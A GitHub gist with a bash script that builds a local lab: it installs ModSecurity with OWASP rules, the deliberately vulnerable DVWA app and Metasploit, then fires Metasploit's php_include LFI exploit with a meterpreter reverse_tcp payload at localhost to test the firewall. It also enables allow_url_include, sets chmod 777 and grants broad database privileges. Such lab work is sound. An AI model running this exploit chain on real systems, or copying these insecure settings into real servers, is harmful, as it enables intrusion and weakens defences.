Skip to content

Instantly share code, notes, and snippets.

@a9v8i
Created February 17, 2021 13:55
Show Gist options
  • Save a9v8i/9033fb57fdb7329db9e254c24c228cdb to your computer and use it in GitHub Desktop.
Save a9v8i/9033fb57fdb7329db9e254c24c228cdb to your computer and use it in GitHub Desktop.
Install and Testing Mod Security (WAF) on DVWA Laboratory with Metasploit LFI Module (php_include)
#!/bin/bash
# v10
# ┌──(unk9vvn㉿avi)-[~]
# └─$ sudo chmod +x ModSecurity-DEB.sh;sudo ./ModSecurity-DEB.sh
# Debian-Kali
# Switch off WAF
# ┌──(unk9vvn㉿avi)-[~]
# └─$ sed -i "s#SecRuleEngine On#SecRuleEngine Off#g" /etc/modsecurity/modsecurity.conf;service apache2 restart
RED='\e[1;31m%s\e[0m\n'
GREEN='\e[1;32m%s\e[0m\n'
YELLOW='\e[1;33m%s\e[0m\n'
BLUE='\e[1;34m%s\e[0m\n'
MAGENTO='\e[1;35m%s\e[0m\n'
CYAN='\e[1;36m%s\e[0m\n'
WHITE='\e[1;37m%s\e[0m\n'
if [ "$(id -u)" != "0" ];then
printf "$RED" "[X] Please run as RooT ..."
printf "$GREEN" "sudo chmod +x ModSecurity-DEB.sh;sudo ./ModSecurity-DEB.sh"
exit 0
fi
MODINSTALL=/etc/modsecurity/
DVWAINSTALL=/var/www/html/DVWA/
METASPLOIT=/usr/share/metasploit-framework/
DEBIAN=$(cat /etc/apt/sources.list|grep -o "deb http://ftp.us.debian.org/debian/ jessie main")
UBUNTU=$(cat /etc/apt/sources.list|grep -o "deb http://http.kali.org/kali kali-rolling main non-free contrib")
if [ "$UBUNTU" != "deb http://http.kali.org/kali kali-rolling main non-free contrib" ]; then
echo "deb http://http.kali.org/kali kali-rolling main non-free contrib" >> /etc/apt/sources.list
echo "# deb-src http://http.kali.org/kali kali-rolling main non-free contrib" >> /etc/apt/sources.list
apt-get -y --allow-unauthenticated install kali-archive-keyring
apt-get update
fi
if [ "$DEBIAN" != "deb http://ftp.us.debian.org/debian/ jessie main" ]; then
echo " " >> /etc/apt/sources.list
echo "deb http://ftp.us.debian.org/debian/ jessie main" >> /etc/apt/sources.list
echo "# deb-src http://ftp.us.debian.org/debian/ jessie main" >> /etc/apt/sources.list
echo " " >> /etc/apt/sources.list
echo "deb http://security.debian.org/ jessie/updates main" >> /etc/apt/sources.list
echo "# deb-src http://security.debian.org/ jessie/updates main" >> /etc/apt/sources.list
echo " " >> /etc/apt/sources.list
echo "deb http://ftp.us.debian.org/debian/ jessie-updates main" >> /etc/apt/sources.list
echo "# deb-src http://ftp.us.debian.org/debian/ jessie-updates main" >> /etc/apt/sources.list
apt-get update
fi
if [ ! -d "$MODINSTALL" ]; then
apt-get update;apt-get install -y git apache2 libapache2-modsecurity libapache2-mod-security2
cp /etc/modsecurity/modsecurity.conf-recommended /etc/modsecurity/modsecurity.conf
sed -i "s#SecRuleEngine DetectionOnly#SecRuleEngine On#g" /etc/modsecurity/modsecurity.conf
rm -rf /usr/share/modsecurity-crs
git clone https://github.com/SpiderLabs/owasp-modsecurity-crs.git /usr/share/modsecurity-crs
mv /usr/share/modsecurity-crs/crs-setup.conf.example /usr/share/modsecurity-crs/crs-setup.conf
echo """
<IfModule security2_module>
# Default Debian dir for modsecurity's persistent data
SecDataDir /var/cache/modsecurity
# Include all the *.conf files in /etc/modsecurity.
# Keeping your local configuration in that directory
# will allow for an easy upgrade of THIS file and
# make your life easier
IncludeOptional /etc/modsecurity/*.conf
# Include OWASP ModSecurity CRS rules if installed
IncludeOptional /usr/share/modsecurity-crs/*.conf
IncludeOptional /usr/share/modsecurity-crs/rules/*.conf
</IfModule>
""" > /etc/apache2/mods-enabled/security2.conf
chmod 755 /etc/apache2/mods-enabled/security2.conf
rm /var/www/html/index.html
fi
if [ ! -d "$DVWAINSTALL" ]; then
apt-get update;apt-get install -y wget unzip mariadb-server php php7.3-mysql php-gd libapache2-mod-php
service mysql start
wget https://github.com/ethicalhack3r/DVWA/archive/master.zip -O /tmp/master.zip
unzip /tmp/master.zip -d /var/www/html/
rm /tmp/master.zip
mv /var/www/html/DVWA-master /var/www/html/DVWA
mv /var/www/html/DVWA/config/config.inc.php.dist /var/www/html/DVWA/config/config.inc.php
chmod 777 /var/www/html/DVWA/hackable/uploads
chmod 777 /var/www/html/DVWA/config
chmod 777 /var/www/html/DVWA/external/phpids/0.6/lib/IDS/tmp/phpids_log.txt
sed -i "s#allow_url_include = Off#allow_url_include = On#g" /etc/php/7.3/apache2/php.ini
sed -i "s#allow_url_fopen = Off#allow_url_fopen = On#g" /etc/php/7.3/apache2/php.ini
sed -i "s#= 'p@ssw0rd'#= '0098'#g" /var/www/html/DVWA/config/config.inc.php
sed -i "s#'db_database' ] = 'dvwa';#'db_database' ] = 'dvwa_db';#g" /var/www/html/DVWA/config/config.inc.php
sed -i "s#'db_user' ] = 'root';#'db_user' ] = 'dvwa';#g" /var/www/html/DVWA/config/config.inc.php
sed -i "s#= 'impossible';#= 'low';#g" /var/www/html/DVWA/config/config.inc.php
mysql -u root -p -h localhost -e "DROP database dvwa_db;DROP USER 'dvwa'@'localhost';"
mysql -u root -p -h localhost -e "CREATE USER 'dvwa'@'localhost' IDENTIFIED BY '0098';GRANT ALL PRIVILEGES ON *.* TO 'dvwa'@'localhost';FLUSH PRIVILEGES;"
mysql -u dvwa -p0098 -e "create database if not exists dvwa_db;"
service mysql restart;service apache2 restart
if [[ -f "/tmp/unk9.vvn" ]]; then
rm /tmp/unk9.vvn
fi
CSRF=$(curl -s -c /tmp/unk9.vvn "127.0.0.1/DVWA/setup.php" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2)
curl -s -b /tmp/unk9.vvn -d "create_db=Create+%2F+Reset+Database&user_token=${CSRF}" "127.0.0.1/DVWA/setup.php"
fi
if [ ! -d "$METASPLOIT" ]; then
apt-get install -y metasploit-framework;service postgresql start;msfdb init
fi
reset;clear
printf "$GREEN" " --/osssssssssssso/-- "
printf "$GREEN" " -+sss+-+--os.yo:++/.o-/sss+- "
printf "$GREEN" " /sy+++-.h.-dd++m+om/s.h.hy/:+oys/ "
printf "$GREEN" " .sy/// h/h-:d-y:/+-/+-+/-s/sodooh:///ys. "
printf "$GREEN" " -ys-ss/:y:so-/osssso++++osssso+.oo+/s-:o.sy- "
printf "$GREEN" " -ys:oossyo/+oyo/:-:.-:.:/.:/-.-:/syo/+/s+:oo:sy- "
printf "$GREEN" " /d/:-soh/-+ho-.:::--:- .os: -:-.:-/::sy+:+ysso+:d/ "
printf "$GREEN" " sy-..+oo-+h:--:..hy+y/ :s+. /y/sh..:/-:h+-oyss:.ys "
printf "$WHITE" " ys :+oo/:d/ .m-yyyo/- - -: .+oyhy-N. /d::yosd.sy "
printf "$WHITE" " oy.++++//d. ::oNdyo: .--. :oyhN+-: .d//s//y.ys "
printf "$WHITE" " :m-y+++//d- dyyy++::-. -.o.-+.- .-::/+hsyd -d/so+++.m: "
printf "$WHITE" " -d/-/+++.m- /.ohso- ://:///++++///://: :odo.+ -m.syoo:/d-"
printf "$WHITE" " :m-+++y:y+ smyms- -//+/-ohho-/+//- omsmo +y s+oy-m:"
printf "$WHITE" " sy:+++y-N- -.dy+:...-- :: ./hh/. :: --...//hh.: -N-o+/:-so"
printf "$WHITE" " yo-///s-m odohd.-.--:/o.-+/::/+-.o/:--.--hd:ho m-s+++-+y"
printf "$WHITE" " yo::/+o-m -yNy/: ...:+s.//:://.s+:... :/yNs m-h++++oy"
printf "$WHITE" " oy/hsss-N- oo:oN- .-o.:ss:--:ss:.o-. -My-oo -N-o+++.so"
printf "$WHITE" " :m :++y:y+ sNMy+: -+/:.--:////:--.:/+- -+hNNs +y-o++o-m:"
printf "$WHITE" " -d/::+o+.m- -:/+ho:. -//- ./sdo::- -m-o++++/d-"
printf "$WHITE" " :m-yo++//d- -ommMo// -: +oyNhmo- -d//s+++-m: "
printf "$WHITE" " oy /o++//d. -::/oMss- -+++s :yNy+/: .d//y+---ys "
printf "$WHITE" " ys--+o++:d/ -/sdmNysNs+/./-//-//hNyyNmmy+- /d-+y--::sy "
printf "$RED" " sy:..ooo-+h/--.-//odm/hNh--yNh+Ndo//-./:/h+-so+:+/ys "
printf "$RED" " /d-o.ssy+-+yo:/:/:-:+sho..ohs/-:://::oh+.h//syo-d/ "
printf "$RED" " -ys-oosyss:/oyy//::..-.--.--:/.//syo+-ys//o/.sy- "
printf "$RED" " -ys.sooh+d-s:+osssysssosssssso:/+/h:/yy/.sy- "
printf "$RED" " .sy/:os.h--d/o+-/+:o:/+.+o:d-y+h-o+-+ys. "
printf "$RED" " :sy+:+ s//sy-y.-h-m/om:s-y.++/+ys/ "
printf "$RED" " -+sss+/o/ s--y.s+/:++-+sss+- "
printf "$RED" " --/osssssssssssso/-- "
printf "$BLUE" " Unk9vvN "
printf "$YELLOW" " https://t.me/Unk9vvN "
printf "$CYAN" " ModSecurity-DEB "
printf "\n\n"
if [[ -f "/tmp/unk9.vvn" ]]; then
rm /tmp/unk9.vvn
fi
service postgresql start;service apache2 start;service mysql start
CSRF=$(curl -s -c /tmp/unk9.vvn "127.0.0.1/DVWA/login.php" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2)
SESSIONID=$(grep PHPSESSID /tmp/unk9.vvn | awk -F ' ' '{print $7}')
curl -s -b /tmp/unk9.vvn -d "username=admin&password=password&user_token=${CSRF}&Login=Login" "127.0.0.1/DVWA/login.php"
echo """
sysinfo
""" > /tmp/autolinux.rc
echo """
use unix/webapp/php_include
set PAYLOAD php/meterpreter/reverse_tcp
set RHOSTS 127.0.0.1
set LHOST 127.0.0.1
set PATH /DVWA/vulnerabilities/fi
set PHPURI /?page=XXpathXX
set HEADERS \"Cookie: security=low; security_level=0; PHPSESSID="$SESSIONID"\"
set AutoRunScript /tmp/autolinux.rc
set EnableStageEncoding true
set PayloadUUIDTracking true
run -j
""" > /tmp/meterpreter.rc
msfconsole -qr /tmp/meterpreter.rc > /dev/null &
printf "\n\n"
printf "$RED" " [*] ModSecurity on Activated..."
printf "$RED" " [*] Attcking LFI with Metasploit..."
printf "$RED" " [*] Enable Apache Log Monitor..."
printf "\n\n"
tail -f /var/log/apache2/error.log
rm -r /tmp/unk9.vvn /tmp/meterpreter.rc /tmp/autolinux.rc
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment